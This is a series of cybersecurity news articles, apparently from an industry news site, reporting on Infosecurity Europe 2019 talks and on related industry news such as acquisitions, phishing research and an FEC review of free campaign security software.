Pilat added that the key to doing that is learning lessons from existing examples, pointing to the “older brother” of traditional IT. “Traditional IT, as we know, exists in many different organizations. We must make sure we provide security in a simple way, without complex policies – we should provide innovation because this is something that we can motivate businesses with.”

She said the industry should not work in siloes and should not focus on security as a separate part of the business. Referring to collaboration, she added: “We must put more effort into educating our business so as to make our colleagues feels more responsible for security and to involve them in the security topics we are covering.”

To conclude, Pilat highlighted six key pieces of advice for security functions looking to support their organization through a process of digital transformation. These were:

  • Recognize scale and complexity
  • Ensure top management support
  • Embed security in the creation of ideas
  • Educate and make the business understand security implications
  • Demonstrate the value added to the business
  • Do not allow creation of shadow security

#Infosec19: Smart Home Ads Could Threaten Democracy

#Infosec19: Smart Home Ads Could Threaten Democracy

The emergence of the smart home is set to usher in a new era of highly targeted, personalized political advertising which could undermine faith in democracy if left unchecked, a leading commentator has warned.

Speaking on the second day of Infosecurity Europe this morning, bestselling author, Jamie Bartlett, argued that many key challenges facing society stem from the incompatibility of established “rules, regulations, systems, norms and behaviors” with digital progress.

“Whether it’s Russian bots, untraceable cryptocurrency or election manipulation, many of the problems are due to the fact the old rules don’t work anymore,” he said.

The Cambridge Analytica scandal offers a glimpse into the future of elections, where small groups of swing voters are profiled and micro-targeted by personalized ads. In this way, elections will increasingly be fought in private, removing legitimacy and allowing the losers to question the results, Bartlett warned.

“Elections become an art of data science and subtle nudges …. the risk is that people stop trusting in elections,” he added. “I guarantee that had the Clinton side won [the US Presidential election], the Trump team would have said the same thing … ‘you cheated’.”

Unfortunately, the “connections craze” typified by the proliferation of smart home devices will only accelerate the challenges facing election regulators, as devices become part of the “matrix” that works to target individuals with political messaging.

Bartlett claimed data science companies could crunch information generated by smart home devices like fridges, allowing them to more accurately profile users for targeting.

For example, they could predict when a voter usually eats dinner, and therefore is likely to be most hungry/irritable – potentially making them more susceptible to messages from politicians with robust opinions on crime or immigration, he suggested.

“The question becomes how can you effectively run an election people trust when [voters are faced with] dynamic content coming through the smart fridge?” said Bartlett. “The problem is that the [election] regulators can’t monitor what people are sharing, what ads they’re seeing.”

The answer is “not beyond the wit of man,” but will require the creation of “clever software” to publicize all the targeted ads currently viewed privately by individual voters, so they can be analyzed and scrutinized, he concluded.

Bartlett also argued that cybercrime will become increasingly automated in the future as tools like AutoSploit allow hackers to launch indiscriminate attacks against businesses of all sizes.

“This means that any vulnerability will be found and exploited in the future,” he warned. “This is why your job is so critical. The closer technology gets to people’s lives, the more it matters to them that it’s secure.”

#Infosec19: CISOs Should Remember to KISS in Board Meetings

#Infosec19: CISOs Should Remember to KISS in Board Meetings

Selling security to the board is all about effective product marketing, and as such requires a deep understanding of the product and audience, and a simple, well-delivered message, according to a leading CISO.

Speaking at Infosecurity Europe, William Hill security chief, Killian Faughnan, argued that keeping things simple is one of the most important things CISOs can do to sell their vision to the board room.

“Data has its place. But that place is mainly in your dashboard. Your job is to crunch that data down to something meaningful,” he told attendees.

“You should always be aiming for just one slide. I never do more than three. If I try to land more than three messages I confuse myself and them, and the audience will just tune out.”

Knowing what kind of message will work depends on reading the customer (board) not as a homogeneous whole but comprised of individual members, with different views and priorities. That requires the CISO to “know what will delight one and frustrate another” and then work out the best approach to maximize impact for all.

“It’s a very soft skill but one of the most important,” Faughnan added.

The art of selling a message, or ‘product,’ to the board, is heavily dependent on the skill of the person delivering that message: the CISO.

“If you confuse them, they’ll look to buy the ‘product’ from someone else, which unfortunately means [in this context] they’ll hire someone else,” he said. “You’re part of the product as much as everything else, so how you present is important. If you’re more engaged, they’ll enjoy it and feel positive about you and your product.”

Part of this skill in delivering a compelling message requires CISOs not to focus too heavily on the negatives, but rather to argue that “the company is doing well but could do better” — before explaining in simple terms how to achieve that, he said.

The focus throughout should be on “stickiness” — what makes a message stick. It’s a concept also crucial to driving success in employee training and awareness programs, Faughnan argued.

#Infosec19 Enable Visibility into App Development for Vulnerability Managment

#Infosec19 Enable Visibility into App Development for Vulnerability Managment

Visibility is key to effective vulnerability management, but do not rely too much on automated solutions to solve your problems.

Speaking at Infosecurity Europe, Edgescan CEO Eoin Keary talked about “moving the cybersecurity dial” when it comes to vulnerabilities and patching. Referring to statistics that Edgescan released earlier this year, he said that 20% of issues they see are related to the SMB protocol, and even after that was exploited by the NotPetya ransomware in 2017, Keary said “we are still finding that”, although not everyone is vulnerable to NotPetya.

He also said that Edgescan is still finding issues with SSL “which is broken from a implementation perspective” and that is why users should move to TLS sooner rather than later, and often legacy systems are found where SSL problems are not being fixed.

Looking at the Bluekeep vulnerability, Keary said that when a patch is issued for Windows XP “you probably want to get worried.”

In terms of how to “move the dial” and improve things, Keary pointed at the main areas. The first was to visibility, especially on ports and servers and what you are not patching, and gain visibility on live hosts and APIs. “Get an idea on your attack surface based on vulnerabilities” and get a base understanding of your infrastructure, and understand your risk posture at any state of time.

“Visibility is about alerting what matters to you and what is deployed, it is also about a bill of materials and remuneration for tech stack and web apps,” he said.

The second point was around patching, as while businesses are good at doing this in the operating system, they are not so good with Struts or servers, and it is worth considering automated patch management and consider using Inspec and GitLab.

The third point was around secure application development, which Keary said “build as securely as you can.” He also recommended rather than “shifting left” to push in both directions, as if it is static system and you are not “pumping code in,” systems can become vulnerable. “Pushing left doesn’t fix this, you need to push right too,” he said.

He also recommended not relying too much on automation, “using augmentation of humans and technology where you can” but “don’t use automation at the cost of accuracy”. Keary concluded by saying: “Don’t sweat the zero days, the majority of vulnerabilities are old and most zero days are from 2015.”

#Infosec19: Winners of European Security Blogger Awards Announced

#Infosec19: Winners of European Security Blogger Awards Announced

The results of the 2019 European Security Blogger Awards have been announced.

Held at an event organized by Eskenzi PR and sponsored by Synopsys, this year saw new awards announced recognizing new blogs and podcasts, as well as newer social media platforms. The winners were as follows:

The n00bs - Best new cybersecurity podcast – Darknet Diaries

The n00bs - Best new/up and coming blog – The Many Hats Club

The Corporates - The Best CyberSecurity Vendor Blog – MalwareBytes

The Corporates - The Best Commercial Twitter Account NCSC

The Best CyberSecurity Podcast – Smashin Security

The Best CyberSecurity Video or CyberSecurity Video Blog Jenny Radcliffe

The Best Personal (non-commercial) Security Blog – Chrissy Morgan

The Most Educational Blog for user awareness – NCSC

The Most Entertaining Blog – Javvad Malik

The Best Technical Blog – DoublePulsar by Kevin Beaumont

The Best TweeterQuentynBlog

The Best Instagrammer – Lausecurity

The Legends of Cybersecurity - Grand Prix for Best Overall Security Blog - Graham Cluley

Ex-NSA Hacker Reviewed by FEC over Software Contribution Offer

Ex-NSA Hacker Reviewed by FEC over Software Contribution Offer

Following the controversy surrounding the hacking and the 2016 U.S. presidential elections, an ex-NSA hacker wants to give political campaigns a free tool to block hackers from getting access to their files. 

Oren Falkowitz, who is also the founder of Area 1, wants to offer the company's software to help protect political campaigns from spear phishing, which Russian military hackers used to gain illegal access to the email accounts of the Democratic National Committee. They also used this technique to access Hillary Clinton's campaign chairman emails in 2016. Speaking to NBC News, Falkowitz comments that campaigns can't afford to spend contribution money on expensive cybersecurity products: "This is exactly the thing we are supposed to be trying to solve against." 

However the Federal Electoral Commission (FEC) issued a draft notice on Monday, June 4, 2019, that recommended the commission vote against Area 1 Security's request to offer cybersecurity software for free to the 2020 presidential campaigns. The reasoning is that a company providing a free product to a political campaign can count as corporate campaign contributions.

Yet Area 1 cites as precedent Microsoft Corp. last year offering "a package of enhanced online account security services to its election-sensitive customers at no additional cost." An exception was made to Microsoft because it would be acting on a "nonpartisan basis."

"Microsoft plans to offer this service for a variety of commercial reasons beyond mere promotion or goodwill, most notably to protect its brand reputation, which would be at risk of severe and long-term damage if the accounts of its election sensitive customers were hacked," the commission ruled in October 2018. On this occasion, though, the FEC found that Area 1 did not meet the same criteria. 

The FBI says political campaigns remain "a top target for foreign influence campaigns," including through hacking. "We recognize that our adversaries are going to keep adapting and upping their game," said FBI director Christopher Wray. "So we are very much viewing 2018 as just kind of a dress rehearsal for the big show in 2020."

The FEC is slated to officially decide on Area 1's request during a public meeting Thursday.

After two years of investigating, Robert S. Mueller III released his investigation, Report on the Investigation into Russian Interference in the 2016 Presidential Election, which showed that Russian hackers interfered in the 2016 presidential election using social media activity, which related back to the Cambridge Analytica exposé in March 2018 and "a Russian intelligence service conducted computer-intrusion operations against entities, employees, and volunteers working on the Clinton Campaign and then released stolen documents."

Imperva Acquires Bot Management Company Distil Networks

Imperva Acquires Bot Management Company Distil Networks

Distil Networks will be acquired by cybersecurity company Imperva, reinforcing its market leadership in the application security market. 

"Distil Networks is a globally recognized leader in automated attack mitigation, and this deal perfectly aligns with our vision of delivering best-in-class cybersecurity solutions that protect businesses throughout their cloud journey,” says Chris Hylen, CEO of Imperva. The company will integrate Distil Networks’ solution into its security stack to deliver complete protection for applications and APIs, wherever they reside.

Bot management protects companies from automated threats such as fake accounts and credit card frauds, account takeover, digital advertising fraud and spam bots. According to Distil Networks' Bad Bot Report 2019, bots were used to exploit social media platforms in an attempt to influence political dialogue and elections, such as with the 2016 U.S. Presidential elections. Other industries find themselves victims to bots including:

  • Airlines suffer from online travel agents, aggregators and competitors using bots to scrape content such as flight information, pricing and seat availability, while criminals attempt to fraudulently access user accounts that contain loyalty program awards and credit card.
  • Competitors use bots to aggressively scrape pricing and inventory information, with criminals using them to commit fraud by stealing gift card balances and to access user accounts and credit card information from e-commerce sites.
  • Brokers, scalpers, hospitality agencies and corporations use bad bots to check for event ticket availability and to purchase available seats to resell on secondary markets.

The report also found that stolen credentials from data breaches are creating a worsening bot problem for any online business having a login page. Criminals use bots to test the "viability of stolen credentials." The research showed that every new data breach sees an increased availability of credentials and leads to higher volumes of bad bot traffic, with over 14 billion credentials stolen since 2013. 

“Bots are an evolving attack vector that has become a threat to all organizations, no matter the size or location,” explained Tiffany Olson Kleemann, CEO of Distil Networks. “We have been leading the charge to find solutions to better understand, detect and mitigate automated attacks since 2011. Today’s announcement serves as a testament to the ingenuity and dedication of Distil Networks’ team over the past eight years to solve this problem for our customers. We are excited to enter into a new chapter with a company that shares our passion for protecting critical business applications and delivering best-in-class security solutions for all customers.”

“Distil Networks gives us a comprehensive Bot Management solution that identifies, responds to and manages a full range of automated attacks no matter where these applications or APIs are deployed," said Hylen. "We believe Imperva and Distil Networks will create the most comprehensive security platform on the market and we’re excited to make this available to our customers worldwide.”

Imperva Acquires Bot Management Company Distill Networks

Imperva Acquires Bot Management Company Distill Networks

Distil Networks will be acquired by cybersecurity company Imperva, reinforcing its market leadership in the application security market. 

"Distil Networks is a globally recognized leader in automated attack mitigation, and this deal perfectly aligns with our vision of delivering best-in-class cybersecurity solutions that protect businesses throughout their cloud journey,” says Chris Hylen, CEO of Imperva. The company will integrate Distil Networks’ solution into its security stack to deliver complete protection for applications and APIs, wherever they reside.

Bot management protects companies from automated threats such as fake accounts and credit card frauds, account takeover, digital advertising fraud and spam bots. According to Distil Networks' Bad Bot Report 2019, bots were used to exploit social media platforms in an attempt to influence political dialogue and elections, such as with the 2016 U.S. Presidential elections. Other industries find themselves victims to bots including:

  • Airlines suffer from online travel agents, aggregators and competitors using bots to scrape content such as flight information, pricing and seat availability, while criminals attempt to fraudulently access user accounts that contain loyalty program awards and credit card.
  • Competitors use bots to aggressively scrape pricing and inventory information, with criminals using them to commit fraud by stealing gift card balances and to access user accounts and credit card information from e-commerce sites.
  • Brokers, scalpers, hospitality agencies and corporations use bad bots to check for event ticket availability and to purchase available seats to resell on secondary markets.

The report also found that stolen credentials from data breaches are creating a worsening bot problem for any online business having a login page. Criminals use bots to test the "viability of stolen credentials." The research showed that every new data breach sees an increased availability of credentials and leads to higher volumes of bad bot traffic, with over 14 billion credentials stolen since 2013. 

“Bots are an evolving attack vector that has become a threat to all organizations, no matter the size or location,” explained Tiffany Olson Kleemann, CEO of Distil Networks. “We have been leading the charge to find solutions to better understand, detect and mitigate automated attacks since 2011. Today’s announcement serves as a testament to the ingenuity and dedication of Distil Networks’ team over the past eight years to solve this problem for our customers. We are excited to enter into a new chapter with a company that shares our passion for protecting critical business applications and delivering best-in-class security solutions for all customers.”

“Distil Networks gives us a comprehensive Bot Management solution that identifies, responds to and manages a full range of automated attacks no matter where these applications or APIs are deployed," said Hylen. "We believe Imperva and Distil Networks will create the most comprehensive security platform on the market and we’re excited to make this available to our customers worldwide.”

Nearly Half of Phishing Attacks Are Polymorphic

Nearly Half of Phishing Attacks Are Polymorphic

Nearly one in two phishing attacks are polymorphic, according to research by IRONSCALES. The self-proclaimed world's first automated phishing prevention, detection and response platform identified 11,733 email phishing attacks that underwent at least one permutation over 12 months, with 52,825 permutations impacting 209,807 inboxes across the world.    

Polymorphism occurs when an attacker implements slight but significant and often random changes to an email, such as its content, copy, subject line, sender name or template, in conjunction with or after an initial attack has deployed. This approach means that attackers can quickly develop phishing attacks that trick signature-based email security tools that were not built to recognize such modifications to threats, ultimately allowing different versions of the same attack to land undetected in employee inboxes. 

This brings extra complexities to security teams who try to defend against polymorphic phishing attacks. According to IRONSCALES, thee attacks remain one of the "most time-consuming and burdensome tasks," especially as phishing kits can be inexpensive on the dark web. Currently, decentralized and distributed intelligence, coupled with non-signature-based email security tools that use artificial intelligence and machine learning to cluster similar attacks together, has proven most successful at mitigating polymorphic email phishing threats.

“Polymorphic email phishing threats represent an incredibly difficult challenge for SOC and IT security teams to overcome,” said Eyal Benishti, founder and CEO, IRONSCALES. “Just as security personnel think that they may have a phishing threat under control, attackers can augment the artifacts to give the message an entirely new signature, thereby enabling what is for all intents and purposes the same malicious message to bypass the same human and technical controls that might have stopped a previous version of the attack.”

These findings come weeks after the company found that secure email gateways (SEGs) failed to stop 99.5% of all non-trivial email spoofing attacks.

A two-year analysis of more than 100,000 verified email spoofing attacks found that the most common spoofing techniques included sender name impersonations and domain look-alike attacks, bypassing SEG technology on a regular basis.

The most common email spoofing attack techniques to bypass SEGs include:

  • Exact sender name impersonations (73.5%): When an email is sent masquerading as coming from a trusted source, such as a colleague. Example:
  • Similar sender name impersonations (24%): When an email is sent masquerading as coming from a trusted source, such as a colleague, with minor obfuscations. Example:
  • Lookalike/cousin domain spoofing (2%): When an email is sent from a similar domain, in which attackers register the domain to set the right authentication records in the DNS. Example:
  • Exact domain spoofs (0.5%). When an email is sent from a fraudulent domain that matches exactly to the spoofed brand’s domain. Example:

#Infosec19: How to Defend Against ‘Multi-Intent’ Malware

#Infosec19: How to Defend Against ‘Multi-Intent’ Malware

Speaking at Infosecurity Europe 2019, Iko Azoulay, founder and CTO of Empow, discussed ‘multi-intent malware’ – which he described as malware designed to have multiple attack impacts and methods that do more than just infect a system for a single goal.

He referred to diversification as an effective development strategy for any business, and explained that cyber-attackers are now turning to diversification in their malware attacks to cause maximum, proliferated impact.

That has made classification of malware attacks a far harder task for organizations, Azoulay added, and so newer strategies must be implemented to establish the intent of modern malware.

He therefore pointed to four key pillars for protecting against multi-intent malware attacks.

The first is auto-classifying all possible intents of malware, and Azoulay suggested a “technology versus technology, or “machine versus machine” approach can be effective.

The second is the use of behavioral-based protection tools, and the third is adding context to alerts as “different contexts may result in different intents and ultimately different protections.”

The fourth pillar of multi-intent malware defense is “acting according to business logic.”

To conclude, Azoulay reiterated the importance of systems that can automate malware and attacker classification to detect, prioritize and remediate both known and unknown threats.

#Infosec19: Threat Intel Sharing: The Future of Resilience, but Use with Caution

#Infosec19: Threat Intel Sharing: The Future of Resilience, but Use with Caution

Speaking at Infosecurity Europe 2019 Chris Doman, security researcher at AT&T Cybersecurity, explored the sharing of threat intelligence data and highlighted how it can be used for the betterment of security and resilience, but also warned that considerations must be made to ensure that the right kind of data is shared.

He said that successful threat intelligence sharing comes down to being able to trust shared data, and it’s about the “quality of the data being shared, and not the quantity.”

For example, he added, on Twitter, there is a lot of “quick Tweeting” of attacks going on, but often a lot of threat information shared on Twitter is wrong – that can be dangerous, Doman explained.

In terms of future trends that will drive threat intel sharing going forward, Doman listed the following:

  • Automated pivoting and enrichments of IOCs
  • Automated threat sharing
  • Encrypted network traffic – JA3(S)
  • Sigma and OSQuery Rules

To conclude, Doman stated that the industry should do more to share threat detection intel, but warned that it should be wary of oversharing threat tracking methods. He also highlighted the importance of being able to “trust your sharing partners” and so verification of shared data is key. Finally, he pointed to automation as being a pivotal technology in the evolution of threat intelligence sharing, but admitted that manual verification will always remain important.

#Infosec19: DNS Security Could Be a Match for Crypto-jacking

#Infosec19: DNS Security Could Be a Match for Crypto-jacking

DNS security tools can offer IT teams a useful way to detect and prevent illegal cryptocurrency mining on their networks, according to Infoblox.

The security vendor’s consulting solutions architect, Chris Marrison, told attendees at Infosecurity Europe today that rapid technology advances over the past couple of years have taken the industry from the digital equivalent of panning for gold to pit mining in a very short space of time.

“However, the cheapest way to access computing power with the best RoI is not to pay for cooling, power or CPUs at all,” he added.

So-called crypto-jacking has emerged as a favorite way for hackers to make money, by handing off the power- and CPU-intensive task of mining for digital currency to infected hosts.

According to Trend Micro, detections peaked last year at over 1.3 million — a 237% increase from 2017.

Although the end of notorious mining tool Coinhive earlier this year seems to have led to a decline in attacks targeted consumers, they’re still on the rise against enterprises.

Crypto-jacking enabled by malware infections is more serious for organizations than in-browser attacks, warned Marrison.

“Using your PC without your consent is one thing, but infections with malware means you’re compromised. In future, this machine is effectively a zombie which could be used for additional malicious activity,” he claimed.

Crypto-mining malware activity can be hard to spot as there’s no attempt to steal data; infections can be spread out across desktops, servers, mobile devices and IoT endpoints; and traffic is difficult to differentiate from legitimate traffic.

However, DNS offers an opportunity to shine a light on such threats, according to Marrison.

By monitoring this channel with specialized tools, organizations can spot attempts by hosts to connect to known crypto-mining malware distribution sites, and detect communications between infected clients and C&C domains, he argued.

DNS tools can also be used to spot fast flux and DGA techniques which rapidly change the C&C’s IP address in a bid to avoid detection. These capabilities should be built into a defense-in-depth approach to cybersecurity including best practice controls such as AV, firewalls and more, Marrison concluded.

#Infosec19: Data Challenges Mean AI Systems Can’t Be Trusted

#Infosec19: Data Challenges Mean AI Systems Can’t Be Trusted

Organizations will never be able to trust artificial intelligence (AI) for cybersecurity decision-making until they can fix data bias and inaccuracies, and challenges around transparency and validation, according to a leading expert.

Speaking at Infosecurity Europe today, Titania chief strategy officer, Nicola Whiting, argued that bad data will always lead to poor decision making in machine learning systems.

This has been seen in the past with Microsoft’s ill-fated Tay AI system, whose Twitter account began spouting racist, sexist and neo-Nazi epithets after “learning” from other social media users.

It can also be witnessed in Amazon’s aborted attempt to use AI in recruitment. A four-year project was shelved last year after managers discovered that it had been learning from biased data favoring male candidates.

Things become a major problem when such systems are used in sensitive areas like criminal justice. Questions have been raised in both the US and UK about systems which are trained using historical data which then builds in the same conscious and unconscious human biases over matters of race.

Thousands of leading AI and robotics experts have also signaled their opposition to attempts to develop autonomous weapons systems.

“If the experts are saying AI is not good enough yet when lives are on the line, how can it be good enough to make decisions on our networks?” argued Whiting.

Part of the problem also lies with the type of data AI systems are being fed, she added.

When used in SIEM systems, AI is typically working with probabilistic data which extrapolates info from how devices respond to attacks or queries and “makes an educated guess” about risk. Using AI in this context effectively layers a “guess on top of a guess,” Whiting warned.

To support effective SOAR (Security Orchestration, Automation and Response) systems, AI instead need to be fed deterministic data where risks are determined from well-defined parameters such as device configurations, she explained.

It can then be harnessed to drive systems that are both self-defending and adaptive, and self-healing, meaning they’ll reconfigure themselves according to best practices and standards.

This will take a lot of pressure off stretched IT security teams, enabling them to focus more fully on reviewing probabilistic data, and drives better decision-making overall, Whiting claimed.

The path towards trustworthy, effective AI lies not only with better understanding bias and focusing on deterministic data and decision-making, but also in being able to validate decision processes and data types/integrity.

Current proprietary systems make that nearly impossible. Trusting such systems is akin to sending your child to university without knowing what course they’re studying or whether the professor is even qualified, Whiting argued.

“The problem with our trust in AI is that we can’t always trust the data is accurate and unbiased; we can’t always access how it thinks; and we can’t validate it either,” she concluded. “Unless we can fix this, I don’t think we’ll ever be able to trust AI.”

#Infosec19: Experts Urge Defense-in-Depth Approach to Security Training

#Infosec19: Experts Urge Defense-in-Depth Approach to Security Training

IT leaders must expand cybersecurity training programs beyond phishing awareness to avoid major blind spots emerging which could lead to security breaches, according to industry experts.

Speaking at an Infosecurity Europe panel debate today, former Bank of Ireland CISO, Flavius Plesu, claimed that phishing accounts for only around 5% of data breaches and leaks. But even if training is largely effective, it only needs one email to get through to let the attackers in — something likely to happen 99.9% of the time if they use sophisticated targeted techniques, he added.

“The industry is excited about phishing awareness because for the first time ever we can measure the impact of training,” argued Plesu, who is now CEO of security start-up OutThink.

“But an exclusive focus on phishing could leave a lot of blind spots and will surprise [the organization] in a negative way.”

HSBC’s Europe and UK CISO, Paula Kershaw, largely agreed, claiming phishing awareness exercises are “an important tool in the box, but not the only tool.”

It’s very important to do as an organization, but running a phishing awareness campaign alone doesn’t protect you,” she added.

Security training could also include elements such as: password management; safe internet usage, data handling and downloads; and compliance requirements, for example.

Staff training should be combined with sandboxing, threat intelligence and other security controls for true defense-in-depth, argued Kershaw.

Misunderstandings about the importance of phishing awareness are part of a wider problem with staff cybersecurity training in that much of it is based on pseudo-science and is therefore unmeasured, added Plesu.

“I’ve learned to hate security awareness training because of the false assumptions and false promises,” he argued. “The false assumption is that pushing more knowledge into the organization will result in more effective risk mitigation.”

Especially in large, complex organizations, it’s vital to measure the core components of any program in real-time and at scale, he said. These include: security awareness; the intention of individuals to comply; the self-efficacy of programs, that is, whether advice can be practically implemented; and cost and productivity impact.

#Infosec19: Shake Up Cybersecurity Training to Keep Ahead of Hackers

#Infosec19: Shake Up Cybersecurity Training to Keep Ahead of Hackers

Cybersecurity training needs to evolve to allow organizations to keep up with today’s sophisticated threat actors, according to Max Vetter, CCO at Immersive Labs.

Vetter was talking at the Infosecurity Europe 2019 event at Kensington Olympia, London today (June 4). During the session, Vetter highlighted the need for innovation in order to match the tools and techniques used by cyber-criminals.

“Attackers’ ability to innovate means they have first mover advantage. If the criminals didn’t innovate, we would have already won,” he told the audience at the conference’s Strategy Talks theatre.

It is creating a need to cultivate the right skills, according to Vetter: “How can we teach people to make sure they can keep ahead of the hackers, legally, while being able to innovate as well?”

Vetter thinks the only way to cultivate the level of talent needed to keep up with cyber-criminals is a shake-up of the way cybersecurity training is done. He points out that current methods often fail because they are “out of date, expensive and trainer dependent” with a “rigid learning style”.

“Certifications are the only way we can do it at the moment, but this method is not great,” Vetter said.

According to Vetter, businesses often make the error of focusing on Red Teams to test systems’ resilience. However, Blue Teams to defend an organization are just as important, he told the audience.

By shaking up the way security professionals are trained, using industry-standard MITRE ATT&CK framework, Vetter thinks organizations can ensure they are one step ahead of attackers.

Specifically, Vetter advocates intelligence-led training to give young hackers the skills to do their job. He advocates being “hands-on, flexible and outcome focused” and to “measure skills and success”.

“We are losing,” says Vetter. “We need to do better at developing people with these skills rather than sending them to jail.”

#Infosec19: Physical Intrusions Too Often Go Unchallenged

#Infosec19: Physical Intrusions Too Often Go Unchallenged

Security awareness techniques rarely work, as too many employees rarely report or spot intrusions.

Speaking at the opening of the Geek Street stage at Infosecurity Europe 2019, Holly Grace, technical director at Secarma, said that too much security awareness training is taught from a negative approach, and this doesn’t work.

Pointing at common efforts to “tailgate” an intruder, Grace said that when doing a physical security test, she had rarely been challenged as a tailgater, as in one instance she was able to access a door that had been propped open with a bunch of car keys. From this, she was able to get to an empty security desk, and see the security guard’s open email and camera screens.

On the case of physical security barriers, Grace said that often the alarm on these is so quiet that no one would notice it sounding. Another way to bypass barriers is to wait for a scheduled fire alarm, as the workplace leaves together and barriers are either bypassed or opened.

Looking at the “bystander effect,” pointing at academic research Grace said that this relates to how people react to an emergency and non-emergency instances. “In a group, 10% will do something about it, if they are on their own they are more likely to do something,” she said. “A stranger is less likely to react if they are surrounded by other people.”

Grace added that staff will not challenge strangers, and strangers “infrequently get challenged.” She said in an test, she will often go with another tester and when she is challenged, the other person acts as a “plan B.”

“Also, you are less likely to be challenged with two people,” she said. “If staff do not have the courage to challenge them for ID, is there a way to report it? This is a problem with bystander effect.”

In closing, Grace also mentioned problems with phishing emails and bad password practice. For the former, she said that all-too-often people are caught out by phishing emails with simple spelling mistakes, and there is no way for malicious attachments to be spotted and reported by employees.

For passwords, Grace recommended using multi-factor authentication or password managers, but asked how many businesses provide a password manager for staff to use?

Concluding, Grace said that there is a disconnect between what pen testers and cyber-criminals can do, and what staff can report, and “diffused responsibility lowers the chance of a challenge.”

LORCA Announces Additions to Cybersecurity Program

LORCA Announces Additions to Cybersecurity Program

The London Office for Rapid Cybersecurity Advancement (LORCA) announced its third round of cybersecurity companies that will be joining its program to address the market need of industry today. The 15 "scaleups" responded to an open call and were invited to pitch their solutions to address the focus areas identified by the association: security by design, basics and beyond. 

According to LORCA, this round of companies is the most "international yet," with companies from Italy, Spain and South Korea entering the program. Margot James, Minister for Digital, said, “Ahead of London Tech Week, it’s great to see that LORCA is now welcoming international companies to the capital, making this a truly global effort to ensure we have a Britain that’s fit for the future.”

The 15 companies will take part in a bespoke progam designed around each of their needs, which will be delivered by Plexal's innovation team, the Centre for Secure Information Technologies (CSIT) at Queen’s University Belfast, and Deloitte’s cyber team.   

Saj Huq, program director of LORCA, commented on the announcement: “We’re delighted with the caliber of the new additions to our program, with the latest cohort representing a host of new and exciting cyber solutions which we’ll be able to scale and help bring to market.

"We’re particularly pleased with the international flavor which the latest group of scaleups brings to LORCA, fortifying our position as a global cyber hub and the UK’s foremost destination for the most advanced technological solutions.”

Companies selected for the program are: 

  1. CounterCraft: Its Cyber Deception Platform detects, investigates and controls targeted attacks to help enterprises understand why cyber-attackers are targeting them and defend their most business-critical assets.
  2. CTO Technologies: The company’s CyberCentral platform enables the public and private sectors to better manage their security risks by automating manual processes – and alleviating the strain on IT teams.
  3. D-RisQ: The company develops and uses automatic, high-integrity software verification tools that are focused on embedded systems and cybersecurity. The tools have been used in a range of sectors, including autonomous vehicles, aerospace and maritime.
  4. Elemendar: Its AI analyst for cyber-threat intelligence (CTI) tells cyber-defense tools what threats to defend against.
  5. Hack The Box: The online platform provides labs and challenges for cybersecurity training, allowing members to exchange ideas and methodologies. 
  6. HumanFirewall: The company gamifies learning through training and phishing simulations, builds individual risk-profiles, rewards real-time reporting and remediates incidents instantly.
  7. Messagenius: The company's enterprise messaging tool for secure, smart and integrated communications among colleagues looks and works just like the company’s everyday messenger while protecting sensitive information.
  8. Panaseer: Its controls monitoring platform gives CISOs visibility of all assets and the confidence that security controls are working effectively.
  9. Quant Network: Its Overledger, the world’s first blockchain operating system, is considered to be leading the way for innovation and blockchain adoption.
  10. SaltDNA: Its product provides secure voice, messaging, conference calling, broadcasting and image or file transfers for busy executives.
  11. Security Alliance: Its cyber-threat intelligence platform, ThreatMatch, helps security analysts, operations teams and security managers focus on cyber-threats that will have the biggest impact on the organization.
  12. Storage Made Easy: Its multi-cloud software product, Enterprise File Fabric, provides a security and governance blanket for siloed company data.
  13. swIDch: Its patented algorithm enables payments companies to generate Dynamic PANs in a networkless environment without the need for any additional infrastructure.
  14. Threat Status: It's Trillion service collects, analyses and provides alerts on the billions of breached credentials from the deep web, closed forums, paste sites and the dark web, looking for the ones that belong to its clients.
  15. Uleska: This scalable platform provides continuous software security testing within DevOps software or IT projects, automating business-risk reporting and communicates security strategy value without the need for more personnel.

Louise Cushnahan, head of innovation at CSIT, said:“Having 15 companies join this cohort highlights the breadth of innovative and emerging cybersecurity focused activity within the UK ecosystem.”

AI Is “Fundamental” to Future of SME Cybersecurity

AI Is "Fundamental" to Future of SME Cybersecurity

Research shows that small and medium enterprises (SMEs), while confident that artificial intelligence (AI) will be vital to the future of cybersecurity, do not feel certain about whether their investment in cybersecurity is worth the cost.

The report by AI cybersecurity company Senseon, The State of Cybersecurity, found that 81% of SMEs believe that AI will be able to improve the security posture of their organizations. A further 76% believing the technology will improve their day-to-day working lives. 

Even though SMEs believe AI will positively affect their business, uptake of AI solutions within SMEs has been slow, with a 4% adoption rate. According to the report, aside from the cost (52%), results show that marketing hype is a barrier to adoption of AI (24%) and a lack of knowledge of AI (36%).

The report also looked at other barriers to implementing cybersecurity, finding that over half (53%) of SMEs feel an increased budget would help them deal with cybersecurity workload. Further, security professionals are uncertain whether they will see return on investment on their current solutions; 49% believe the business will see an overall net loss due to cybersecurity investment. 

David Atkinson, CEO and founder of Senseon, commented, “Issues within SMEs surrounding security are centered around stringent budgets, and frantic adoption of more and more tools is likely resulting in needless costs for the businesses." 

"No matter what the maturity of a business or indeed the maturity of its security stack, it is vital that C-suite, IT and security teams rationalize their existing technologies and look to prove a strong return on investment, as well as protecting the business," he continued. "Ultimately, the cost of AI solutions is countered by its ability to automate the detection of threats and to augment the role of security analysts, which saves security teams valuable time by separating the signal from the noise and flagging the genuinely malicious threats.”

The report also shows that 69% of SMEs are looking to implement AI security solutions in the next five years and 44% are planning to invest in AI or machine learning defense in the immediate future. 

Sophos Acquires Rook Security to Bolster MDR Services

Sophos Acquires Rook Security to Bolster MDR Services

British cybersecurity company Sophos has acquired Rook Security, a provider of managed detection and response (MDR) services. The privately owned Rook provides a team of cyber-threat hunters and incident response experts who "monitor, hunt for, analyze and respond to security incidents" for businesses. 

Combining Rook's services with its recently acquired DarkBytes technology platform, Sophos is planning to create re-sellable MDR services to approximately 47,000 channel partners worldwide. Addition to this, Rook's team of security investigators will be able to use Sophos' security technology and products for the company's customers. 

“Cyber-criminals are relentlessly trying to exploit organizations with techniques ranging from tried-and-true phishing emails to the more recent trend of ‘hacker pen-testing’ to find weaknesses in their surface area. As a result, businesses need 24-hour, seven-days-a-week monitoring and management of what is happening on their network, yet many of them do not have the expertise, can’t keep up or don’t have the security teams in house to optimally configure and manage security around the clock,” says Joe Levy, chief technology officer at Sophos. “With MDR, Sophos’ channel partners will be able to provide businesses of all sizes with expert services that continuously detect, hunt for and respond to security incidents.”

